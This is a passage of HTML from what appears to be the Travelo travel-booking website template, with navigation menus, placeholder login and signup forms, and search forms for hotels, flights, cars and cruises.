<li><a href="pages-contactus3.html">Contact Us 3</a></li>
<li><a href="pages-travelo-policies.html">Travelo Policies</a></li>
<li><a href="pages-sitemap.html">Site Map</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="#">Extra Pages</a>
<ul class="clearfix">
<li><a href="extra-pages-holidays.html">Holidays</a></li>
<li><a href="extra-pages-hotdeals.html">Hot Deals</a></li>
<li><a href="extra-pages-before-you-fly.html">Before You Fly</a></li>
<li><a href="extra-pages-inflight-experience.html">Inflight Experience</a></li>
<li><a href="extra-pages-things-todo1.html">Things To Do 1</a></li>
<li><a href="extra-pages-things-todo2.html">Things To Do 2</a></li>
<li><a href="extra-pages-travel-essentials.html">Travel Essentials</a></li>
<li><a href="extra-pages-travel-stories.html">Travel Stories</a></li>
<li><a href="extra-pages-travel-guide.html">Travel Guide</a></li>
<li><a href="extra-pages-travel-ideas.html">Travel Ideas</a></li>
<li><a href="extra-pages-travel-insurance.html">Travel Insurance</a></li>
<li><a href="extra-pages-group-booking.html">Group Bookings</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="#">Special Pages</a>
<ul class="clearfix">
<li><a href="pages-404-1.html">404 Page 1</a></li>
<li><a href="pages-404-2.html">404 Page 2</a></li>
<li><a href="pages-404-3.html">404 Page 3</a></li>
<li><a href="pages-coming-soon1.html">Coming Soon 1</a></li>
<li><a href="pages-coming-soon2.html">Coming Soon 2</a></li>
<li><a href="pages-coming-soon3.html">Coming Soon 3</a></li>
<li><a href="pages-loading1.html">Loading Page 1</a></li>
<li><a href="pages-loading2.html">Loading Page 2</a></li>
<li><a href="pages-loading3.html">Loading Page 3</a></li>
<li><a href="pages-login1.html">Login Page 1</a></li>
<li><a href="pages-login2.html">Login Page 2</a></li>
<li><a href="pages-login3.html">Login Page 3</a></li>
</ul>
</li>
</ul>
</div>
</div>
</li>
<li class="menu-item-has-children">
<a href="#">Shortcodes</a>
<ul>
<li><a href="shortcode-accordions-toggles.html">Accordions & Toggles</a></li>
<li><a href="shortcode-tabs.html">Tabs</a></li>
<li><a href="shortcode-buttons.html">Buttons</a></li>
<li><a href="shortcode-icon-boxes.html">Icon Boxes</a></li>
<li><a href="shortcode-gallery-styles.html">Image & Gallery Styles</a></li>
<li><a href="shortcode-image-box-styles.html">Image Box Styles</a></li>
<li class="menu-item-has-children">
<a href="#">Listing Styles</a>
<ul>
<li><a href="shortcode-listing-style1.html">Listing Style 01</a></li>
<li><a href="shortcode-listing-style2.html">Listing Style 02</a></li>
<li><a href="shortcode-listing-style3.html">Listing Style 03</a></li>
</ul>
</li>
<li><a href="shortcode-dropdowns.html">Dropdowns</a></li>
<li><a href="shortcode-pricing-tables.html">Pricing Tables</a></li>
<li><a href="shortcode-testimonials.html">Testimonials</a></li>
<li><a href="shortcode-our-team.html">Our Team</a></li>
<li><a href="shortcode-gallery-popup.html">Gallery Popup</a></li>
<li><a href="shortcode-map-popup.html">Map Popup</a></li>
<li><a href="shortcode-style-changer.html">Style Changer</a></li>
<li><a href="shortcode-typography.html">Typography</a></li>
<li><a href="shortcode-animations.html">Animations</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="#">Bonus</a>
<ul>
<li><a href="dashboard1.html">Dashboard 1</a></li>
<li><a href="dashboard2.html">Dashboard 2</a></li>
<li><a href="dashboard3.html">Dashboard 3</a></li>
<li class="menu-item-has-children">
<a href="#">7 Footer Styles</a>
<ul>
<li><a href="#">Default Style</a></li>
<li><a href="footer-style1.html">Footer Style 1</a></li>
<li><a href="footer-style2.html">Footer Style 2</a></li>
<li><a href="footer-style3.html">Footer Style 3</a></li>
<li><a href="footer-style4.html">Footer Style 4</a></li>
<li><a href="footer-style5.html">Footer Style 5</a></li>
<li><a href="footer-style6.html">Footer Style 6</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="#">8 Header Styles</a>
<ul>
<li><a href="#">Default Style</a></li>
<li><a href="header-style1.html">Header Style 1</a></li>
<li><a href="header-style2.html">Header Style 2</a></li>
<li><a href="header-style3.html">Header Style 3</a></li>
<li><a href="header-style4.html">Header Style 4</a></li>
<li><a href="header-style5.html">Header Style 5</a></li>
<li><a href="header-style6.html">Header Style 6</a></li>
<li><a href="header-style7.html">Header Style 7</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="#">7 Inner Start Styles</a>
<ul>
<li><a href="#">Default Style</a></li>
<li><a href="inner-starts-style1.html">Inner Start Style 1</a></li>
<li><a href="inner-starts-style2.html">Inner Start Style 2</a></li>
<li><a href="inner-starts-style3.html">Inner Start Style 3</a></li>
<li><a href="inner-starts-style4.html">Inner Start Style 4</a></li>
<li><a href="inner-starts-style5.html">Inner Start Style 5</a></li>
<li><a href="inner-starts-style6.html">Inner Start Style 6</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="#">3 Search Styles</a>
<ul>
<li><a href="search-style1.html">Search Style 1</a></li>
<li><a href="search-style2.html">Search Style 2</a></li>
<li><a href="search-style3.html">Search Style 3</a></li>
</ul>
</li>
</ul>
</li>
</ul>
</nav>
</div>
<nav id="mobile-menu-01" class="mobile-menu collapse">
<ul id="mobile-primary-menu" class="menu">
<li class="menu-item-has-children">
<a href="index.html">Home</a>
<ul>
<li><a href="index.html">Home Layout 1</a></li>
<li><a href="homepage2.html">Home Layout 2</a></li>
<li><a href="homepage3.html">Home Layout 3</a></li>
<li><a href="homepage4.html">Home Layout 4</a></li>
<li><a href="homepage5.html">Home Layout 5</a></li>
<li><a href="homepage6.html">Home Layout 6</a></li>
<li><a href="homepage7.html">Home Layout 7</a></li>
<li><a href="homepage8.html">Home Layout 8</a></li>
<li><a href="homepage9.html">Home Layout 9</a></li>
<li><a href="homepage10.html">Home Layout 10</a></li>
<li><a href="homepage11.html">Home Layout 11</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="hotel-index.html">Hotels</a>
<ul>
<li><a href="hotel-index.html">Home Hotels</a></li>
<li><a href="hotel-list-view.html">List View</a></li>
<li><a href="hotel-grid-view.html">Grid View</a></li>
<li><a href="hotel-block-view.html">Block View</a></li>
<li><a href="hotel-detailed.html">Detailed</a></li>
<li><a href="hotel-booking.html">Booking</a></li>
<li><a href="hotel-thankyou.html">Thank You</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="flight-index.html">Flights</a>
<ul>
<li><a href="flight-index.html">Home Flights</a></li>
<li><a href="flight-list-view.html">List View</a></li>
<li><a href="flight-grid-view.html">Grid View</a></li>
<li><a href="flight-block-view.html">Block View</a></li>
<li><a href="flight-detailed.html">Detailed</a></li>
<li><a href="flight-booking.html">Booking</a></li>
<li><a href="flight-thankyou.html">Thank You</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="car-index.html">Cars</a>
<ul>
<li><a href="car-index.html">Home Cars</a></li>
<li><a href="car-list-view.html">List View</a></li>
<li><a href="car-grid-view.html">Grid View</a></li>
<li><a href="car-block-view.html">Block View</a></li>
<li><a href="car-detailed.html">Detailed</a></li>
<li><a href="car-booking.html">Booking</a></li>
<li><a href="car-thankyou.html">Thank You</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="cruise-index.html">Cruises</a>
<ul>
<li><a href="cruise-index.html">Home Cruises</a></li>
<li><a href="cruise-list-view.html">List View</a></li>
<li><a href="cruise-grid-view.html">Grid View</a></li>
<li><a href="cruise-block-view.html">Block View</a></li>
<li><a href="cruise-detailed.html">Detailed</a></li>
<li><a href="cruise-booking.html">Booking</a></li>
<li><a href="cruise-thankyou.html">Thank You</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="tour-index.html">Tour</a>
<ul>
<li><a href="tour-index.html">Home Tour</a></li>
<li><a href="tour-fancy-package-2column.html">Fancy Packages 2 Column</a></li>
<li><a href="tour-fancy-package-3column.html">Fancy Packages 3 Column</a></li>
<li><a href="tour-fancy-package-4column.html">Fancy Packages 4 Column</a></li>
<li><a href="tour-simple-package-2column.html">Simple Packages 2 Column</a></li>
<li><a href="tour-simple-package-3column.html">Simple Packages 3 Column</a></li>
<li><a href="tour-simple-package-4column.html">Simple Packages 4 Column</a></li>
<li><a href="tour-simple-package-3column.html">Location - Eruope</a></li>
<li><a href="tour-simple-package-4column.html">Location - North America</a></li>
<li><a href="tour-detailed1.html">Detailed 1</a></li>
<li><a href="tour-detailed2.html">Detailed 2</a></li>
<li><a href="tour-booking.html">Booking</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="#">Pages</a>
<ul>
<li class="menu-item-has-children">
<a href="#">Standard Pages</a>
<ul>
<li><a href="pages-aboutus1.html">About Us 1</a></li>
<li><a href="pages-aboutus2.html">About Us 2</a></li>
<li><a href="pages-services1.html">Services 1</a></li>
<li><a href="pages-services2.html">Services 2</a></li>
<li><a href="pages-photogallery-4column.html">Gallery 4 Column</a></li>
<li><a href="pages-photogallery-3column.html">Gallery 3 Column</a></li>
<li><a href="pages-photogallery-2column.html">Gallery 2 Column</a></li>
<li><a href="pages-photogallery-fullview.html">Gallery Read</a></li>
<li><a href="pages-blog-rightsidebar.html">Blog Right Sidebar</a></li>
<li><a href="pages-blog-leftsidebar.html">Blog Left Sidebar</a></li>
<li><a href="pages-blog-fullwidth.html">Blog Full Width</a></li>
<li><a href="pages-blog-read.html">Blog Read</a></li>
<li><a href="pages-faq1.html">Faq 1</a></li>
<li><a href="pages-faq2.html">Faq 2</a></li>
<li><a href="pages-layouts-leftsidebar.html">Layouts Left Sidebar</a></li>
<li><a href="pages-layouts-rightsidebar.html">Layouts Right Sidebar</a></li>
<li><a href="pages-layouts-twosidebar.html">Layouts Two Sidebar</a></li>
<li><a href="pages-layouts-fullwidth.html">Layouts Full Width</a></li>
<li><a href="pages-contactus1.html">Contact Us 1</a></li>
<li><a href="pages-contactus2.html">Contact Us 2</a></li>
<li><a href="pages-contactus3.html">Contact Us 3</a></li>
<li><a href="pages-travelo-policies.html">Travelo Policies</a></li>
<li><a href="pages-sitemap.html">Site Map</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="#">Extra Pages</a>
<ul>
<li><a href="extra-pages-holidays.html">Holidays</a></li>
<li><a href="extra-pages-hotdeals.html">Hot Deals</a></li>
<li><a href="extra-pages-before-you-fly.html">Before You Fly</a></li>
<li><a href="extra-pages-inflight-experience.html">Inflight Experience</a></li>
<li><a href="extra-pages-things-todo1.html">Things To Do 1</a></li>
<li><a href="extra-pages-things-todo2.html">Things To Do 2</a></li>
<li><a href="extra-pages-travel-essentials.html">Travel Essentials</a></li>
<li><a href="extra-pages-travel-stories.html">Travel Stories</a></li>
<li><a href="extra-pages-travel-guide.html">Travel Guide</a></li>
<li><a href="extra-pages-travel-ideas.html">Travel Ideas</a></li>
<li><a href="extra-pages-travel-insurance.html">Travel Insurance</a></li>
<li><a href="extra-pages-group-booking.html">Group Bookings</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="#">Special Pages</a>
<ul>
<li><a href="pages-404-1.html">404 Page 1</a></li>
<li><a href="pages-404-2.html">404 Page 2</a></li>
<li><a href="pages-404-3.html">404 Page 3</a></li>
<li><a href="pages-coming-soon1.html">Coming Soon 1</a></li>
<li><a href="pages-coming-soon2.html">Coming Soon 2</a></li>
<li><a href="pages-coming-soon3.html">Coming Soon 3</a></li>
<li><a href="pages-loading1.html">Loading Page 1</a></li>
<li><a href="pages-loading2.html">Loading Page 2</a></li>
<li><a href="pages-loading3.html">Loading Page 3</a></li>
<li><a href="pages-login1.html">Login Page 1</a></li>
<li><a href="pages-login2.html">Login Page 2</a></li>
<li><a href="pages-login3.html">Login Page 3</a></li>
</ul>
</li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="#">Shortcodes</a>
<ul>
<li><a href="shortcode-accordions-toggles.html">Accordions & Toggles</a></li>
<li><a href="shortcode-tabs.html">Tabs</a></li>
<li><a href="shortcode-buttons.html">Buttons</a></li>
<li><a href="shortcode-icon-boxes.html">Icon Boxes</a></li>
<li><a href="shortcode-gallery-styles.html">Image & Gallery Styles</a></li>
<li><a href="shortcode-image-box-styles.html">Image Box Styles</a></li>
<li class="menu-item-has-children">
<a href="#">Listing Styles</a>
<ul>
<li><a href="shortcode-listing-style1.html">Listing Style 01</a></li>
<li><a href="shortcode-listing-style2.html">Listing Style 02</a></li>
<li><a href="shortcode-listing-style3.html">Listing Style 03</a></li>
</ul>
</li>
<li><a href="shortcode-dropdowns.html">Dropdowns</a></li>
<li><a href="shortcode-pricing-tables.html">Pricing Tables</a></li>
<li><a href="shortcode-testimonials.html">Testimonials</a></li>
<li><a href="shortcode-our-team.html">Our Team</a></li>
<li><a href="shortcode-gallery-popup.html">Gallery Popup</a></li>
<li><a href="shortcode-map-popup.html">Map Popup</a></li>
<li><a href="shortcode-style-changer.html">Style Changer</a></li>
<li><a href="shortcode-typography.html">Typography</a></li>
<li><a href="shortcode-animations.html">Animations</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="#">Bonus</a>
<ul>
<li><a href="dashboard1.html">Dashboard 1</a></li>
<li><a href="dashboard2.html">Dashboard 2</a></li>
<li><a href="dashboard3.html">Dashboard 3</a></li>
<li class="menu-item-has-children">
<a href="#">7 Footer Styles</a>
<ul>
<li><a href="#">Default Style</a></li>
<li><a href="footer-style1.html">Footer Style 1</a></li>
<li><a href="footer-style2.html">Footer Style 2</a></li>
<li><a href="footer-style3.html">Footer Style 3</a></li>
<li><a href="footer-style4.html">Footer Style 4</a></li>
<li><a href="footer-style5.html">Footer Style 5</a></li>
<li><a href="footer-style6.html">Footer Style 6</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="#">8 Header Styles</a>
<ul>
<li><a href="#">Default Style</a></li>
<li><a href="header-style1.html">Header Style 1</a></li>
<li><a href="header-style2.html">Header Style 2</a></li>
<li><a href="header-style3.html">Header Style 3</a></li>
<li><a href="header-style4.html">Header Style 4</a></li>
<li><a href="header-style5.html">Header Style 5</a></li>
<li><a href="header-style6.html">Header Style 6</a></li>
<li><a href="header-style7.html">Header Style 7</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="#">7 Inner Start Styles</a>
<ul>
<li><a href="#">Default Style</a></li>
<li><a href="inner-starts-style1.html">Inner Start Style 1</a></li>
<li><a href="inner-starts-style2.html">Inner Start Style 2</a></li>
<li><a href="inner-starts-style3.html">Inner Start Style 3</a></li>
<li><a href="inner-starts-style4.html">Inner Start Style 4</a></li>
<li><a href="inner-starts-style5.html">Inner Start Style 5</a></li>
<li><a href="inner-starts-style6.html">Inner Start Style 6</a></li>
</ul>
</li>
<li class="menu-item-has-children">
<a href="#">3 Search Styles</a>
<ul>
<li><a href="search-style1.html">Search Style 1</a></li>
<li><a href="search-style2.html">Search Style 2</a></li>
<li><a href="search-style3.html">Search Style 3</a></li>
</ul>
</li>
</ul>
</li>
</ul>
<ul class="mobile-topnav container">
<li><a href="#">MY ACCOUNT</a></li>
<li class="ribbon language menu-color-skin">
<a href="#" data-toggle="collapse">ENGLISH</a>
<ul class="menu mini">
<li><a href="#" title="Dansk">Dansk</a></li>
<li><a href="#" title="Deutsch">Deutsch</a></li>
<li class="active"><a href="#" title="English">English</a></li>
<li><a href="#" title="Español">Español</a></li>
<li><a href="#" title="Français">Français</a></li>
<li><a href="#" title="Italiano">Italiano</a></li>
<li><a href="#" title="Magyar">Magyar</a></li>
<li><a href="#" title="Nederlands">Nederlands</a></li>
<li><a href="#" title="Norsk">Norsk</a></li>
<li><a href="#" title="Polski">Polski</a></li>
<li><a href="#" title="Português">Português</a></li>
<li><a href="#" title="Suomi">Suomi</a></li>
<li><a href="#" title="Svenska">Svenska</a></li>
</ul>
</li>
<li><a href="#travelo-login" class="soap-popupbox">LOGIN</a></li>
<li><a href="#travelo-signup" class="soap-popupbox">SIGNUP</a></li>
<li class="ribbon currency menu-color-skin">
<a href="#">USD</a>
<ul class="menu mini">
<li><a href="#" title="AUD">AUD</a></li>
<li><a href="#" title="BRL">BRL</a></li>
<li class="active"><a href="#" title="USD">USD</a></li>
<li><a href="#" title="CAD">CAD</a></li>
<li><a href="#" title="CHF">CHF</a></li>
<li><a href="#" title="CNY">CNY</a></li>
<li><a href="#" title="CZK">CZK</a></li>
<li><a href="#" title="DKK">DKK</a></li>
<li><a href="#" title="EUR">EUR</a></li>
<li><a href="#" title="GBP">GBP</a></li>
<li><a href="#" title="HKD">HKD</a></li>
<li><a href="#" title="HUF">HUF</a></li>
<li><a href="#" title="IDR">IDR</a></li>
</ul>
</li>
</ul>
</nav>
</div>
<div id="travelo-signup" class="travelo-signup-box travelo-box">
<div class="login-social">
<a href="#" class="button login-facebook"><i class="soap-icon-facebook"></i>Login with Facebook</a>
<a href="#" class="button login-googleplus"><i class="soap-icon-googleplus"></i>Login with Google+</a>
</div>
<div class="seperator"><label>OR</label></div>
<div class="simple-signup">
<div class="text-center signup-email-section">
<a href="#" class="signup-email"><i class="soap-icon-letter"></i>Sign up with Email</a>
</div>
<p class="description">By signing up, I agree to Travelo's Terms of Service, Privacy Policy, Guest Refund olicy, and Host Guarantee Terms.</p>
</div>
<div class="email-signup">
<form>
<div class="form-group">
<input type="text" class="input-text full-width" placeholder="first name">
</div>
<div class="form-group">
<input type="text" class="input-text full-width" placeholder="last name">
</div>
<div class="form-group">
<input type="text" class="input-text full-width" placeholder="email address">
</div>
<div class="form-group">
<input type="password" class="input-text full-width" placeholder="password">
</div>
<div class="form-group">
<input type="password" class="input-text full-width" placeholder="confirm password">
</div>
<div class="form-group">
<div class="checkbox">
<label>
<input type="checkbox"> Tell me about Travelo news
</label>
</div>
</div>
<div class="form-group">
<p class="description">By signing up, I agree to Travelo's Terms of Service, Privacy Policy, Guest Refund Policy, and Host Guarantee Terms.</p>
</div>
<button type="submit" class="full-width btn-medium">SIGNUP</button>
</form>
</div>
<div class="seperator"></div>
<p>Already a Travelo member? <a href="#travelo-login" class="goto-login soap-popupbox">Login</a></p>
</div>
<div id="travelo-login" class="travelo-login-box travelo-box">
<div class="login-social">
<a href="#" class="button login-facebook"><i class="soap-icon-facebook"></i>Login with Facebook</a>
<a href="#" class="button login-googleplus"><i class="soap-icon-googleplus"></i>Login with Google+</a>
</div>
<div class="seperator"><label>OR</label></div>
<form>
<div class="form-group">
<input type="text" class="input-text full-width" placeholder="email address">
</div>
<div class="form-group">
<input type="password" class="input-text full-width" placeholder="password">
</div>
<div class="form-group">
<a href="#" class="forgot-password pull-right">Forgot password?</a>
<div class="checkbox checkbox-inline">
<label>
<input type="checkbox"> Remember me
</label>
</div>
</div>
</form>
<div class="seperator"></div>
<p>Don't have an account? <a href="#travelo-signup" class="goto-signup soap-popupbox">Sign up</a></p>
</div>
</header>
<div id="slideshow">
<div class="fullwidthbanner-container">
<div class="revolution-slider" style="height: 0; overflow: hidden;">
<ul> <!-- SLIDE -->
<!-- Slide1 -->
<li data-transition="zoomin" data-slotamount="7" data-masterspeed="1500">
<!-- MAIN IMAGE -->
<img src="http://placehold.it/2080x646" alt="">
</li>
<!-- Slide2 -->
<li data-transition="zoomout" data-slotamount="7" data-masterspeed="1500">
<!-- MAIN IMAGE -->
<img src="http://placehold.it/2080x646" alt="">
</li>
<!-- Slide3 -->
<li data-transition="slidedown" data-slotamount="7" data-masterspeed="1500">
<!-- MAIN IMAGE -->
<img src="http://placehold.it/2080x646" alt="">
</li>
</ul>
</div>
</div>
</div>
<section id="content">
<div class="search-box-wrapper">
<div class="search-box container">
<ul class="search-tabs clearfix">
<li class="active"><a href="#hotels-tab" data-toggle="tab">HOTELS</a></li>
<li><a href="#flights-tab" data-toggle="tab">FLIGHTS</a></li>
<li><a href="#flight-and-hotel-tab" data-toggle="tab">FLIGHT & HOTELS</a></li>
<li><a href="#cars-tab" data-toggle="tab">CARS</a></li>
<li><a href="#cruises-tab" data-toggle="tab">CRUISES</a></li>
<li><a href="#flight-status-tab" data-toggle="tab">FLIGHT STATUS</a></li>
<li><a href="#online-checkin-tab" data-toggle="tab">ONLINE CHECK IN</a></li>
</ul>
<div class="visible-mobile">
<ul id="mobile-search-tabs" class="search-tabs clearfix">
<li class="active"><a href="#hotels-tab">HOTELS</a></li>
<li><a href="#flights-tab">FLIGHTS</a></li>
<li><a href="#flight-and-hotel-tab">FLIGHT & HOTELS</a></li>
<li><a href="#cars-tab">CARS</a></li>
<li><a href="#cruises-tab">CRUISES</a></li>
<li><a href="#flight-status-tab">FLIGHT STATUS</a></li>
<li><a href="#online-checkin-tab">ONLINE CHECK IN</a></li>
</ul>
</div>
<div class="search-tab-content">
<div class="tab-pane fade active in" id="hotels-tab">
<form action="hotel-list-view.html" method="post">
<div class="row">
<div class="form-group col-sm-6 col-md-3">
<h4 class="title">Where</h4>
<label>Your Destination</label>
<input type="text" class="input-text full-width" placeholder="enter a destination or hotel name" />
</div>
<div class="form-group col-sm-6 col-md-4">
<h4 class="title">When</h4>
<div class="row">
<div class="col-xs-6">
<label>Check In</label>
<div class="datepicker-wrap">
<input type="text" name="date_from" class="input-text full-width" placeholder="mm/dd/yy" />
</div>
</div>
<div class="col-xs-6">
<label>Check Out</label>
<div class="datepicker-wrap">
<input type="text" name="date_to" class="input-text full-width" placeholder="mm/dd/yy" />
</div>
</div>
</div>
</div>
<div class="form-group col-sm-6 col-md-3">
<h4 class="title">Who</h4>
<div class="row">
<div class="col-xs-4">
<label>Rooms</label>
<div class="selector">
<select class="full-width">
<option value="1">01</option>
<option value="2">02</option>
<option value="3">03</option>
<option value="4">04</option>
</select>
</div>
</div>
<div class="col-xs-4">
<label>Adults</label>
<div class="selector">
<select class="full-width">
<option value="1">01</option>
<option value="2">02</option>
<option value="3">03</option>
<option value="4">04</option>
</select>
</div>
</div>
<div class="col-xs-4">
<label>Kids</label>
<div class="selector">
<select class="full-width">
<option value="1">01</option>
<option value="2">02</option>
<option value="3">03</option>
<option value="4">04</option>
</select>
</div>
</div>
</div>
</div>
<div class="form-group col-sm-6 col-md-2 fixheight">
<label class="hidden-xs"> </label>
<button type="submit" class="full-width icon-check animated" data-animation-type="bounce" data-animation-duration="1">SEARCH NOW</button>
</div>
</div>
</form>
</div>
<div class="tab-pane fade" id="flights-tab">
<form action="flight-list-view.html" method="post">
<div class="row">
<div class="col-md-4">
<h4 class="title">Where</h4>
<div class="form-group">
<label>Leaving From</label>
<input type="text" class="input-text full-width" placeholder="city, distirct or specific airpot" />
</div>
<div class="form-group">
<label>Going To</label>
<input type="text" class="input-text full-width" placeholder="city, distirct or specific airpot" />
</div>
</div>
<div class="col-md-4">
<h4 class="title">When</h4>
<label>Departing On</label>
<div class="form-group row">
<div class="col-xs-6">
<div class="datepicker-wrap">
<input type="text" name="date_from" class="input-text full-width" placeholder="mm/dd/yy" />
</div>
</div>
<div class="col-xs-6">
<div class="selector">
<select class="full-width">
<option value="1">anytime</option>
<option value="2">morning</option>
</select>
</div>
</div>
</div>
<label>Arriving On</label>
<div class="form-group row">
<div class="col-xs-6">
<div class="datepicker-wrap">
<input type="text" name="date_to" class="input-text full-width" placeholder="mm/dd/yy" />
</div>
</div>
<div class="col-xs-6">
<div class="selector">
<select class="full-width">
<option value="1">anytime</option>
<option value="2">morning</option>
</select>
</div>
</div>
</div>
</div>
<div class="col-md-4">
<h4 class="title">Who</h4>
<div class="form-group row">
<div class="col-xs-3">
<label>Adults</label>
<div class="selector">
<select class="full-width">
<option value="1">01</option>
<option value="2">02</option>
<option value="3">03</option>
<option value="4">04</option>
</select>
</div>
</div>
<div class="col-xs-3">
<label>Kids</label>
<div class="selector">
<select class="full-width">
<option value="1">01</option>
<option value="2">02</option>
<option value="3">03</option>
<option value="4">04</option>
</select>
</div>
</div>
<div class="col-xs-6">
<label>Promo Code</label>
<input type="text" class="input-text full-width" placeholder="type here" />
</div>
</div>
<div class="form-group row">
<div class="col-xs-3">
<label>Infants</label>
<div class="selector">
<select class="full-width">
<option value="1">01</option>
<option value="2">02</option>
<option value="3">03</option>
<option value="4">04</option>
</select>
</div>
</div>
<div class="col-xs-6 pull-right">
<label> </label>
<button class="full-width icon-check">SERACH NOW</button>
</div>
</div>
</div>
</div>
</form>
</div>
<div class="tab-pane fade" id="flight-and-hotel-tab">
<form action="flight-list-view.html" method="post">
<div class="row">
<div class="col-md-4">
<h4 class="title">Where</h4>
<div class="form-group">
<label>Leaving From</label>
<input type="text" class="input-text full-width" placeholder="city, distirct or specific airpot" />
</div>
<div class="form-group">
<label>Going To</label>
<input type="text" class="input-text full-width" placeholder="city, distirct or specific airpot" />
</div>
</div>
<div class="col-md-4">
<h4 class="title">When</h4>
<label>Departing On</label>
<div class="form-group row">
<div class="col-xs-6">
<div class="datepicker-wrap">
<input type="text" name="date_from" class="input-text full-width" placeholder="mm/dd/yy" />
</div>
</div>
<div class="col-xs-6">
<div class="selector">
<select class="full-width">
<option value="1">anytime</option>
<option value="2">morning</option>
</select>
</div>
</div>
</div>
<label>Arriving On</label>
<div class="form-group row">
<div class="col-xs-6">
<div class="datepicker-wrap">
<input type="text" name="date_to" class="input-text full-width" placeholder="mm/dd/yy" />
</div>
</div>
<div class="col-xs-6">
<div class="selector">
<select class="full-width">
<option value="1">anytime</option>
<option value="2">morning</option>
</select>
</div>
</div>
</div>
</div>
<div class="col-md-4">
<h4 class="title">Who</h4>
<div class="form-group row">
<div class="col-xs-3">
<label>Adults</label>
<div class="selector">
<select class="full-width">
<option value="1">01</option>
<option value="2">02</option>
<option value="3">03</option>
<option value="4">04</option>
</select>
</div>
</div>
<div class="col-xs-3">
<label>Kids</label>
<div class="selector">
<select class="full-width">
<option value="1">01</option>
<option value="2">02</option>
<option value="3">03</option>
<option value="4">04</option>
</select>
</div>
</div>
<div class="col-xs-6">
<label>Promo Code</label>
<input type="text" class="input-text full-width" placeholder="type here" />
</div>
</div>
<div class="form-group row">
<div class="col-xs-3">
<label>Rooms</label>
<div class="selector">
<select class="full-width">
<option value="1">01</option>
<option value="2">02</option>
<option value="3">03</option>
<option value="4">04</option>
</select>
</div>
</div>
<div class="col-xs-6 pull-right">
<label> </label>
<button class="full-width icon-check">SERACH NOW</button>
</div>
</div>
</div>
</div>
</form>
</div>
<div class="tab-pane fade" id="cars-tab">
<form action="car-list-view.html" method="post">
<div class="row">
<div class="col-md-4">
<h4 class="title">Where</h4>
<div class="form-group">
<label>Pick Up</label>
<input type="text" class="input-text full-width" placeholder="city, distirct or specific airpot" />
</div>
<div class="form-group">
<label>Drop Off</label>
<input type="text" class="input-text full-width" placeholder="city, distirct or specific airpot" />
</div>
</div>
<div class="col-md-4">
<h4 class="title">When</h4>
<div class="form-group">
<label>Pick-Up Date / Time</label>
<div class="row">
<div class="col-xs-6">
<div class="datepicker-wrap">
<input type="text" name="date_from" class="input-text full-width" placeholder="mm/dd/yy" />
</div>
</div>
<div class="col-xs-6">
<div class="selector">
<select class="full-width">
<option value="1">anytime</option>
<option value="2">morning</option>
</select>
</div>
</div>
</div>
</div>
<div class="form-group">
<label>Drop-Off Date / Time</label>
<div class="row">
<div class="col-xs-6">
<div class="datepicker-wrap">
<input type="text" name="date_to" class="input-text full-width" placeholder="mm/dd/yy" />
</div>
</div>
<div class="col-xs-6">
<div class="selector">
<select class="full-width">
<option value="1">anytime</option>
<option value="2">morning</option>
</select>
</div>
</div>
</div>
</div>
</div>
<div class="col-md-4">
<h4 class="title">Who</h4>
<div class="form-group row">
<div class="col-xs-3">
<label>Adults</label>
<div class="selector">
<select class="full-width">
<option value="1">01</option>
<option value="2">02</option>
<option value="3">03</option>
<option value="4">04</option>
</select>
</div>
</div>
<div class="col-xs-3">
<label>Kids</label>
<div class="selector">
<select class="full-width">
<option value="1">01</option>
<option value="2">02</option>
<option value="3">03</option>
<option value="4">04</option>
</select>
</div>
</div>
<div class="col-xs-6">
<label>Promo Code</label>
<input type="text" class="input-text full-width" placeholder="type here" />
</div>
</div>
<div class="form-group row">
<div class="col-xs-6">
<label>Car Type</label>
<div class="selector">
<select class="full-width">
<option value="">select a car type</option>
<option value="economy">Economy</option>
<option value="compact">Compact</option>
</select>
</div>
</div>
<div class="col-xs-6">
<label> </label>
<button class="full-width icon-check">SERACH NOW</button>
</div>
</div>
</div>
</div>
</form>
</div>
<div class="tab-pane fade" id="cruises-tab">
<form action="cruise-list-view.html" method="post">
<div class="row">
<div class="col-md-4">
<h4 class="title">Where</h4>
<div class="form-group">
<label>Your Destination</label>
<input type="text" class="input-text full-width" placeholder="enter a destination or hotel name" />
</div>
</div>
<div class="col-md-4">
<h4 class="title">When</h4>
<div class="form-group row">
<div class="col-xs-6">
<label>Departure Date</label>
<div class="datepicker-wrap">
<input type="text" class="input-text full-width" placeholder="mm/dd/yy" />
</div>
</div>
<div class="col-xs-6">
<label>Cruise Length</label>
<div class="selector">
<select class="full-width">
<option value="">select length</option>
<option value="1">1-2 Nights</option>
<option value="2">3-4 Nights</option>
</select>
</div>
</div>
</div>
</div>
<div class="col-md-4">
<h4 class="title">Who</h4>
<div class="form-group row">
<div class="col-xs-6">
<label>Cruise Line</label>
<div class="selector">
<select class="full-width">
<option value="">select cruise line</option>
<option>Azamara Club Cruises</option>
<option>Carnival Cruise Lines</option>
<option>Celebrity Cruises</option>
<option>Costa Cruise Lines</option>
<option>Cruise & Maritime Voyages</option>
<option>Crystal Cruises</option>
<option>Cunard Line Ltd.</option>
<option>Disney Cruise Line</option>
<option>Holland America Line</option>
<option>Hurtigruten Cruise Line</option>
<option>MSC Cruises</option>
<option>Norwegian Cruise Line</option>
<option>Oceania Cruises</option>
<option>Orion Expedition Cruises</option>
<option>P&O Cruises</option>
<option>Paul Gauguin Cruises</option>
<option>Peter Deilmann Cruises</option>
<option>Princess Cruises</option>
<option>Regent Seven Seas Cruises</option>
<option>Royal Caribbean International</option>
<option>Seabourn Cruise Line</option>
<option>Silversea Cruises</option>
